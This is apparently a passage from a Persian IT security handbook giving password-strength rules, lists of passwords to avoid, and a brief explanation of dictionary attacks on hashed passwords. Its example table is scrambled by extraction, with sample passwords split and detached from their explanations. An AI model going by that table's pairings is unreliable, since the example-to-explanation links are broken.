‫ﺍﺯ ﺭﻗﻢ "‪ "5‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪ "S‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﻳﻨﻜـﺎﺭ‬
‫ﺗﺮﻓﻨﺪ ﺧﻮﺑﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻳـﺎﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻳـﻚ‬
‫ﻼ ﺁﺷﻨﺎﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻣﻬﺎﺟﻢ ﺣﺮﻓﻪﺍﻱ ﺑﺎ ﺍﻳﻦ ﺣﻘـﻪﻫـﺎ ﻛـﺎﻣ ﹰ‬
‫ﺣﻘﻪﻫﺎ ﻛﺎﺭ ﻭﻱ ﺭﺍ ﻛﻤﻲ ﺳﺨﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﻏﻴﺮ ﻣﻤﻜـﻦ‬
‫ﻧﻤﻲﺳﺎﺯﺩ‪.‬‬
‫•‬
‫ﺣﺮﻑ "‪ "I‬ﺭﺍ ﺑﻪ ﺟﺎﻱ "‪) "eye‬ﭼﺸﻢ( ﻳﺎ "‪ "aye‬ﻳﺎ ﻫﺮ ﻛﻠﻤﺔ‬
‫ﻣﻌﻨﺎﺩﺍﺭ ﺩﺭ ﺯﺑﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻋﻮﺽ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺑﺨـﺼﻮﺹ‬
‫ﺑﺮﺍﻱ ﻟﻐﺎﺗﻲ ﻣﺜـﻞ "‪ "icon‬ﻛـﻪ ﭘـﺲ ﺍﺯ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺑـﻪ‬
‫"‪ "eyecon‬ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ ﻣﻔﻴﺪ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺳﻮﻡ‪:‬‬
‫ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧـﺮﺍ ﺑﺮﺍﺣﺘـﻲ‬
‫ﺑﻪ ﺧﺎﻃﺮ ﺁﻭﺭﺩ‪ ،‬ﻭﻟﻲ ﺣﺪﺱ ﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ‬
‫ﻣﺸﻜﻞ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﻪ ﻋﻠﺖ ﻓﻘـﺪﺍﻥ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻴﺰﺑـﺎﻥ‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺭﻣﺰ ﻋﺒـﻮﺭ‬
‫ﺗﻤﺎﻣﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺖ ﻳﺎﺑﻨﺪ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ‬
‫ﻱ‬
‫ﺑﻴﺎﺑﻨﺪ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭ ﹺ‬
‫ﻳﻜﺴﻮﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ﺑﺎﺯ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻛﺸﻒ ﻛﻨﺪ؛ ﭼـﻮﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ‬
‫ﺁﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤـﺔ ﻛﻠﻤـﺎﺕ ﺩﺭﻭﻥ ﻓﺮﻫﻨـﮓ‬
‫ﻼ ﺍﮔـﺮ‬
‫ﻟﻐﺎﺕ ﻭ ﺳﺎﻳﺮ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺘﺪﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﻟﺬﺍ ﻣـﺜ ﹰ‬
‫ﺷﻤﺎ ﺍﺯ ﻛﻠﻤﺔ ‪ birthday‬ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷـﻴﺪ‬
‫ﻣﻬﺎﺟﻢ ﻫﻨﮕﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻤـﺔ ‪ birthday‬ﻣﺘﻮﺟـﻪ ﻣـﻲﺷـﻮﺩ‬
‫ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷـﺪﻩ ﺁﻥ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺍﺳـﺖ‬
‫ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻭ ﻟﺬﺍ ﺍﺯ ﺁﻥ ﭘﺲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻛﻞ ﺍﻳﺪﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﺍﺟﺎﺯﺓ‬
‫ﻭﺭﻭﺩ ﺷﻤﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺭ ﺯﻣﺎﻥ ﺩﻟﺨﻮﺍﻩ ﻭ ﺩﺷـﻮﺍﺭ ﻛـﺮﺩﻥ ﺣـﺪﺱ‬
‫ﺁﻥ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺍﺳـﺖ‪ ،‬ﻣـﻲﺗـﻮﺍﻥ ﭼﻨـﺪ ﻣﺸﺨـﺼﻪ ﺑـﺮﺍﻱ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺑﺮ ﺷـﻤﺮﺩ‪ .‬ﻣـﺸﺎﺑﻪ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪،‬‬
‫ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗـﻮﺍﻧﻴﻦ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻣـﺰ‬
‫ﻋﺒﻮﺭ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻧﺪ )ﺣﺪﺍﻗﻞ ﻭ ﺣـﺪﺍﻛﺜﺮ ﻃـﻮﻝ‪ ،‬ﺣـﺮﻭﻑ ﻣﺠـﺎﺯ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ(‪.‬‬
‫•‬
‫ﻫﺮﮔﺰ ﺍﺯ ﻳﻚ ﻛﻠﻤﺔ ﻣﻨﻔﺮﺩ ﺩﺭ ﺯﺑﺎﻥ ﻣﺎﺩﺭﻱ ﺧـﻮﺩ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴـﺪ‪ .‬ﺍﻧﺘﺨـﺎﺏ ﻳـﻚ ﻋﺒـﺎﺭﺕ‪ ،‬ﻳـﻚ‬
‫ﺟﻤﻠــﻪ‪ ،‬ﻭ ﻳــﺎ ﻗﻄﻌــﺎﺗﻲ ﺍﺯ ﻛﻠﻤــﺎﺕ ﺑــﺮﺍﻱ ﺍﻳــﻦ ﻣﻨﻈــﻮﺭ‬
‫ﻣﻨﺎﺳﺐﺗﺮ ﺍﺳﺖ‪.‬‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﺳﻴﺴﺘﻢ ﻫﻢ ﺣﺮﻭﻑ ﺑﺰﺭﮒ ﻭ ﻫﻢ ﺣﺮﻭﻑ ﻛﻮﭼﻚ‬
‫ﺭﺍ ﺩﺭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻭﻑ ﻣﺠﺎﺯ ﻗﻠﻤﺪﺍﺩ ﻣﻲﻛﻨﺪ‪،‬‬
‫ﺍﺯ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ‪ -‬ﻭﻟﻲ ﻧﻪ ﺩﺭ ﺟﺎﻱ ﺻﺤﻴﺢ‬
‫ﻲ ﺧﻮﺩ‪.‬‬
‫ﻭ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨ ﹺ‬
‫‪٦٣‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫•‬
‫ﺩﺭ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻑ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﺍﺯ ﻣﻘـﺪﺍﺭ‬
‫ﻣﻌﻴﻨﻲ ﺑﻴﺸﺘﺮ ﺑﺎﺷﺪ ﻭ ﻳـﺎ ﺗﻌـﺪﺍﺩ ﻣﺸﺨـﺼﻲ ﺍﺯ ﺣـﺮﻭﻑ ﻭ‬
‫ﺍﺭﻗﺎﻡ ﺑﻪ ﺍﺗﻔﺎﻕ ﻫﻢ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ‪ .‬ﺍﮔـﺮ ﺩﺭ ﺗﺎﻳـﭗ ﻛـﺮﺩﻥ‬
‫ﺣﺮﻭﻑ ﺿﻌﻴﻒ ﺑﺎﺷﻴﺪ ﻭ ﻓﺮﺩﻱ ﺍﺯ ﭘﺸﺖ ﺳـﺮ ﺑـﻪ ﺷـﻤﺎ ﻭ‬
‫ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧﮕﺎﻩ ﻛﻨﺪ‪ ،‬ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺭﺍ‬
‫ﺑﻔﻬﻤﺪ‪.‬‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﺗﻮﺿﻴﺤﺎﺕ‬
‫ﻋﺒــﺎﺭﺗﻲ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧــﻪ ﺑــﺎ ﺁﻥ‬
‫ﻣﻮﺍﻓﻖ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﻳﻚ ﺟـﺎﻱ ﺧـﺎﻟﻲ ﻣﻨﺎﺳـﺐ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻃﻨﺰﺁﻣﻴﺰ ﺍﺯ ﺣﺮﻭﻑ ﺑﺰﺭﮒ‪.‬‬
‫ﺭﻗﻢ "‪ "0‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪ "5" ،"O‬ﺑﺠـﺎﻱ "‪"@" ،"S‬‬
‫ﺑﺠﺎﻱ "‪ "#" ،"a‬ﺑﺠـﺎﻱ "‪ "V" ،"E‬ﺑﺠـﺎﻱ "‪ ،"U‬ﻭ‬
‫"‪ "1‬ﺑﺠﺎﻱ ﺣﺮﻑ "‪"L‬؛ ﺩﺭ ﺍﻳﻦ ﻣﺜـﺎﻝ ﺟـﺎﻱ ﺧـﺎﻟﻲ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻋﺒــﺎﺭﺕ ﺍﻭﻟﻴــﻪ ﺑــﺪﻭﻥ ﺟــﺎﻱ ﺧــﺎﻟﻲ ﻭ ﻗــﺮﺍﺭﺩﺍﺩﻥ‬
‫ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﺑﻴﻦ ﻫﺮ ‪ ۴‬ﺣﺮﻑ‪.‬‬
‫ﻋﺒﺎﺭﺕ ﺍﻭﻟﻴﻪ ﺑﺎ ﭼﻨﺪ ﺣﺮﻑ ﺟﺎ ﺍﻓﺘﺎﺩﻩ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫‪o‬‬
‫‪Comutrsa‬‬
‫‪reusful‬‬
‫‪o‬‬
‫‪Comp9uter8sa‬‬
‫‪re7usef6ul‬‬
‫‪o‬‬
‫ﻳﻚ ﻧﺎﻡ ﻳﺎ ﻣﺸﺘﻘﺎﺕ ﺁﻥ؛‬
‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻳﺎ ﺍﺳﻢ ﻣﺴﺘﻌﺎﺭ ﺧﻮﺩﺗﺎﻥ؛‬
‫ﻧﺎﻡ ﻫﻤﺴﺮ‪ ،‬ﻳﺎ ﺍﺳﺎﻣﻲ ﻓﺮﺯﻧﺪﺍﻥ ﻭ ﻭﺍﻟﺪﻳﻦ؛‬
‫ﺍﺳﺎﻣﻲ ﺩﻭﺳﺘﺎﻥ‪ ،‬ﺭﺅﺳﺎ ﻭ ﻳﺎ ﻫﻤﻜﺎﺭﺍﻥ؛‬
‫ﺍﺳﺎﻣﻲ ﺣﻴﻮﺍﻧﺎﺕ ﺧﺎﻧﮕﻲ؛‬
‫ﺭﻭﺯ ﺗﻮﻟﺪ ﺧﻮﺩ ﻳﺎ ﻫﺮﻳﻚ ﺍﺯ ﺩﻭﺳﺘﺎﻥ ﻭ ﺧﻮﻳﺸﺎﻭﻧﺪﺍﻥ؛‬
‫ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ‪ ،‬ﺷﻤﺎﺭﺓ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻳﺎ ﻣﺪﺍﺭﻙ ﻣﺸﺎﺑﻪ؛‬
‫ﺭﻧﮓ ﻣﻮﺭﺩ ﻋﻼﻗﻪ؛‬
‫ﻣﻘﺎﻡ ﻳﺎ ﻋﻨﻮﺍﻥ ﺷﻐﻠﻲ؛‬
‫ﻧﺎﻡ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ؛‬
‫ﻫﺮ ﭼﻴﺰ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻳﺪ؛‬
‫ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻛﻼﺳــﻴﻚ ﻣﺜــﻞ "‪ "Xyzzy‬ﻳــﺎ‬
‫"‪) "Plover‬ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺑﺎﺯﻱﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ(‪ ،‬ﻭ "‪"open sesame‬؛‬
‫ﻟﻐﺎﺗﻲ ﻛﻪ ﺩﺭ ﻓﻴﻠﻤﻬﺎﻱ ﻣﺤﺒـﻮﺏ ﻭ ﻣﻌـﺮﻭﻑ‪ ،‬ﺍﺧﺒـﺎﺭ‪،‬‬
‫ﺩﺍﺳﺘﺎﻧﻬﺎ ﻭ ﻳﺎ ﺍﺩﺑﻴﺎﺕ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ؛ ﻣﺜـﻞ‬
‫"‪ "Lord of the Rings" ،"Harry Potter‬ﻭ‬
‫"‪"Gone with the Wind‬؛‬
‫ﺣﺮﻭﻑ ﺭﻭﻱ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﻛـﻪ ﺩﺭ ﻛﻨـﺎﺭ ﻫـﻢ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﻣﺎﻧﻨﺪ "‪"SDFGHJ‬؛‬
‫ﻣﺜﺎﻟﻬﺎﻱ ﻗﺒﻞ ﺑﻪ ﺍﺿﺎﻓﺔ ﻳﻚ ﺭﻗﻢ ﻗﺒﻞ ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻧﻬﺎ؛‬
‫ﺗﻜﺮﺍﺭ ﺣﺮﻭﻑ ﻳﺎ ﺍﺭﻗﺎﻡ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻳﺎ ﺑﺼﻮﺭﺕ ﺗﺮﺗﻴﺒﻲ‬
‫ﻣﺜﻞ "‪ "aaaa9999" ،"۱۲۳۴۵۶‬ﻳﺎ "‪."ABCDE‬‬
‫@‪C0mputer5‬‬
‫‪reus#fv1‬‬
‫•‬
‫ﻫﺮﮔﺰ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪:‬‬
‫ﺑﻬﺘﺮﻳﻦ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺭﺷﺘﻪﺍﻱ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﺍﺭﻗﺎﻡ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ‬
‫ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﻣﺎ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺍﻳﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ‬
‫ﻼ ﺟﺎﻟـﺐ ﻧﻴـﺴﺖ ﻛـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺩﺭ ﻳـﻚ ﺩﻓﺘـﺮ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺻ ﹰ‬
‫ﻳﺎﺩﺩﺍﺷﺖ ﻳﺎ ﺯﻳﺮ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻧﻮﺷـﺘﻪ ﺷـﺪﻩ ﺑﺎﺷـﺪ‪ .‬ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺍﺯ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺣﺮﻭﻑ‪ ،‬ﺷﻤﺎﺭﻩﻫﺎ‪،‬‬
‫ﻧﺸﺎﻧﻪ ﻫﺎﻱ ﺧﺎﺹ ﻭ ﺟﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ ﻭ ﻣﻴﺎﻥ ﺣـﺮﻭﻑ‬
‫ﻼ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻛﻮﭼﻚ ﻭ ﺑﺰﺭﮒ ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﻣﻲﺷﻮﻧﺪ ﺫﻳ ﹰ‬
‫ﺭﻣﺰﻫﺎ ﺑﺴﺎﺩﮔﻲ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩ ﻣﻲﺷـﻮﻧﺪ‪ ،‬ﺍﻣـﺎ ﻳـﺎﻓﺘﻦ ﺁﻧﻬـﺎ ﺩﺭ‬
‫ﻓﺮﻫﻨﮕﻬﺎﻱ ﻟﻐﺎﺕ ﻭ ﻳﺎ ﺣﺪﺱ ﺯﺩﻧﺸﺎﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪Computers‬‬
‫‪aReuseFul‬‬
‫•‬
‫ﻫﺠﻲ ﻛﺮﺩﻥ ﻟﻐﺎﺕ ﺑﺼﻮﺭﺕ ﺑﺮﻋﻜﺲ ﺁﻧﻬﺎ ﺭﺍ ﻛﻤﻲ ﻣـﺒﻬﻢ‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺷﻨﺎﺳﺎﻳﻲﺷﺎﻥ ﺭﺍ ﺳﺨﺖ ﻧﻤﻲﻧﻤﺎﻳﺪ‪.‬‬
‫•‬
‫ﻫﺮﮔـﺰ ﻓﻬﺮﺳـﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱﻧـﺸﺪﺓ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺩﺭ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺫﺧﻴﺮﻩ ﻧﻜﻨﻴﺪ‪.‬‬
‫‪Computers‬‬
‫‪Are Useful‬‬
‫•‬
‫ﺍﺯ ﺳﺮﻧﺎﻡﻫﺎ )ﺣﺮﻭﻑ ﺍﻭﻝ ﻟﻐﺘﻬﺎﻱ ﺳﺎﺯﻧﺪﻩ ﻳﻚ ﻋﺒﺎﺭﺕ( ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ "‪ "tgbwc‬ﺳـﺮﻧﺎﻣﻲ ﺑـﺮﺍﻱ ﺷـﻌﺎﺭ‬
‫ﻣﻌـﺮﻭﻑ ﻛﻮﻛـﺎﻛﻮﻻ )"‪("Things Go Better With Coke‬‬
‫ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﺮﭼﻪ ﻛﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﻧﻮﺷﺘﻦ ﺁﻧـﺮﺍ ﺑﺨـﺎﻃﺮ‬
‫ﺑﺴﭙﺎﺭﻳﺪ‪ .‬ﻫﺮﮔﺰ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺭﺍ ﺟـﺎﻳﻲ ﻧﻨﻮﻳـﺴﻴﺪ ﻭ ﺁﻧـﺮﺍ ﺩﺭ‬
‫ﻣﺤﻞ ﻛﺎﺭ ﻳﺎ ﺭﻭﻱ ﺑﺮﭼﺴﺒﻬﺎﻱ ﻋﻨﺎﻭﻳﻦ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪.‬‬
‫‪٦٤‬‬
‫‪Onupatithwa‬‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻨﹼﺖ ﻗـﺼﻪ ﮔـﻮﻳﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺷﻜﺎﻝ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺩﺍﺳﺘﺎﻥ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺯﺑﺎﻥ ﺍﻧﮕﻠﻴﺴﻲ ﺩﺍﺳﺘﺎﻧﻬﺎﻱ ﻛﻮﺩﻛﺎﻥ‬
‫ﻻ ﺑـﺎ ﻋﺒـﺎﺭﺕ ‪Once upon a time,‬‬
‫ﻣﻌﻤـﻮ ﹰ‬
‫‪ there was‬ﺷﺮﻭﻉ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻣﺜـﺎﻝ ﺍﺯ‬
‫ﺍﺑﺘﺪﺍﻱ ﻫﺮ ﻟﻐﺖ ﺩﻭ ﺣﺮﻑ ﮔﺮﻓﺘﻪ ﺷـﺪﻩ ﺗـﺎ ﻃـﻮﻝ‬
‫ﻛﻠﻤﻪ ﻋﺒﻮﺭ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ ﻭ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﻗﺎﺑـﻞ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﺪ‪.‬‬
‫@‪oNup‬‬
‫‪T-1thuua‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻫﻤﺎﻥ ﻋﺒﺎﺭﺕ ﻗﺒﻠـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ ﺟـﺎﻳﮕﺰﻳﻨﻲﻫـﺎ ﻭ‬
‫ﻋﻼﻣﺘﻬﺎﻱ ﮔﻔﺘﻪﺷﺪﻩ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬
‫ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﺘﻴﺎﺯﺍﺕ‪ ٢٦‬ﻣﺤﺪﻭﺩﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨـﺪ‬
‫ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻛﻤﺘﺮ ﺍﺳـﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺭﺍﻫﺒـﺮ ﻭ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﻳﻜﻲ ﺑﺎﺷﻨﺪ )ﻧﻈﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ( ﻛـﺎﺭﺑﺮ‬
‫ﻛﻠﻴﺔ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﺘﻴـﺎﺯ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﻣـﻞ‬
‫)ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﻳﺸﻪ‪ ٢٧‬ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ‪ (٢٨‬ﺍﻧﺠﺎﻡ ﻣﻲ ﺩﻫﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﻬﺘﺮ‬
‫ﺍﺳﺖ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﺭﺍﻫﺒﺮﻱ ﺍﺯ ﻳـﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻣﺠـﺰﺍ‬
